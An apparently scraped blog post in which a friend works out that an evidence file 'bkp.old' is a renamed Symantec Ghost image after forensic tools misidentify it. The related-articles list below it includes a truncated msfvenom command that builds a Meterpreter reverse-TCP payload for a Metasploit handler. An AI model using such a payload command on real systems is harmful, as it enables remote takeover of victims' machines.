My friend May she found a strange file called "bkp.old" as below in the evidence files. She decided to use forensic tools to take a look at it and figure it out what's going on.

FTK said that it's an unknown file. But May was not satistify with this answer.

May used EnCase to conduct a file signature analysis on this evidence. Guess what? The signature analysis result was "Match". The file type was "Old Configuration Settings (ASCII)". May refused to believe it. That's too ridiculous!!!

May took a look at it's file header and compared with "File Type Signature Search.txt" . That's it. It's a Symantec Ghost Image file.

The suspect changed its ext name and bkp.gho became bkp.old. But to May's surprise forensic tools could not recognize this file correctly~ I taught May how to verify the file signature of a file. The verify result is as below.

Also I taught May how to mount a gho file and see what's inside this gho file. She did find some important files in this gho file and she exported those files to take a further examination.

File signature analysis fails to recognize .old file的更多相关文章

  1. File signature analysis failed to recognize .old file

    My friend May she found a strange file called "bkp.old" as below in the evidence files. Sh ...

  2. Natas Wargame Level 13 Writeup(文件上传漏洞,篡改file signature,Exif)

    aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAAqMAAADDCAYAAAC29BgbAAAABHNCSVQICAgIfAhkiAAAIABJREFUeF

  3. linux C file format analysis

    c语言文件格式 source file file.c C source, ASCII text pretreatment 预处理文件 file.i C source, ASCII text assem ...

  4. Azure File Storage 基本用法 -- Azure Storage 之 File

    Azure Storage 是微软 Azure 云提供的云端存储解决方案,当前支持的存储类型有 Blob.Queue.File 和 Table. 笔者在<Azure Blob Storage 基 ...

  5. Solved Unable to copy the source file ./installer/services.sh to the destination file /etc/vmware-t

    Sometimes when you intall vmwaretools there will be some problems such as "Unable to copy the s ...

  6. 【ZBar】ios错误ignoring file xxx missing required architecture x86_64 in file

    解决方法: 1.在Project target里"Architectures"设置为:Standard (armv7,armv7s)或者  Standard (armv7,arm6 ...

  7. linux,安装软件报错cannot create regular file '/usr/local/man/man1': No such file or directory

    make install时报错,如下 install: cannot create regular file '/usr/local/man/man1': No such file or direct ...

  8. mac 启动php-fpm报错 failed to open configuration file '/private/etc/php-fpm.conf': No such file or direc

    直接运行,有报错找不到配置文件. $ php-fpm [11-Jan-2014 16:03:03] ERROR: failed to open configuration file '/private ...

  9. 解决Warning: unlink(/storage/cache/cache.catalog.language.1556158719): No such file or directory in /system/library/cache/file.php on line 68问题

    ytkah在调试opencart项目时提示Warning: unlink(/storage/cache/cache.catalog.language.1556158719): No such file ...

随机推荐

  1. Kali-利用metasploit中的exploit/multi/handler进行攻击

    在攻击服务器上生成连接软件,LHOST为攻击机IP地址 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=4 ...

  2. 【React】react学习笔记03-React组件对象的三大属性-state

    今天晚上学习了React中state的使用,特做此记录,对于学习的方式,博主仍然推荐直接复制完整代码,对着注释观察现象!: 上文中,我列举了两种React自定义组件的声明,这里我拿方式二进行举例: / ...

  3. apache出现forbidden

    <Directory /> Options FollowSymLinks AllowOverride All Order deny,allow allow from all Require ...

  4. J2SE的基本简介与J2EE/J2ME的差异

    J2SE简介与J2EE.J2ME的比较 Java2平台包括:标准版(J2SE).企业版(J2EE)和微缩版(J2ME)三个版本. J2SE,J2ME和J2EE,这也就是SunONE(Open NetE ...

  5. Matplotlib快速入门

    Matplotlib 可能还有小伙伴不知道Matplotlib是什么,下面是维基百科的介绍. Matplotlib 是Python编程语言的一个绘图库及其数值数学扩展 NumPy.它为利用通用的图形用 ...

  6. PyCharm问题-ModuleNotFoundError: No module named 'pymysql'

    在使用PyCharm时遇到pymysql模块导入有问题,本人使用的是Windows,但解决问题的方法是一致的,先来安装pymysql: 用管理员身份运行CMD.exe,然后查看python的安装路径 ...

  7. Python开发【第六篇】: 面向对象

    内容概要 面向对象和面向过程 面向对象三大特征 面向对象的成员 类与类之间的关系 约束 type.issubclass.isinstance self.super.MRO 1. 面向对象和面向过程 0 ...

  8. fis3前端工程构建配置入门教程

    一.前言 fis3是百度推出的一款前端工程构建工具,类似的还有webpack,gulp等工具:无论大家有没有使用过,从事前端行业应该都略知一二了,所以对于此类工具用干嘛的我这里就不做重复了. 其实对于 ...

  9. sql-实现select取行号、分组后在分组内排序、每个分组中的前n条数据

    表结构设计: 实现select取行号 sql局部变量的2种方式 set @name='cm3333f'; select @id:=1; 区别:set 可以用=号赋值,而select 不行,必须使用:= ...

  10. 统计学习方法9—EM算法

      EM算法是一种迭代算法,是一种用于计算包含隐变量概率模型的最大似然估计方法,或极大后验概率.EM即expectation maximization,期望最大化算法. 1. 极大似然估计   在概率 ...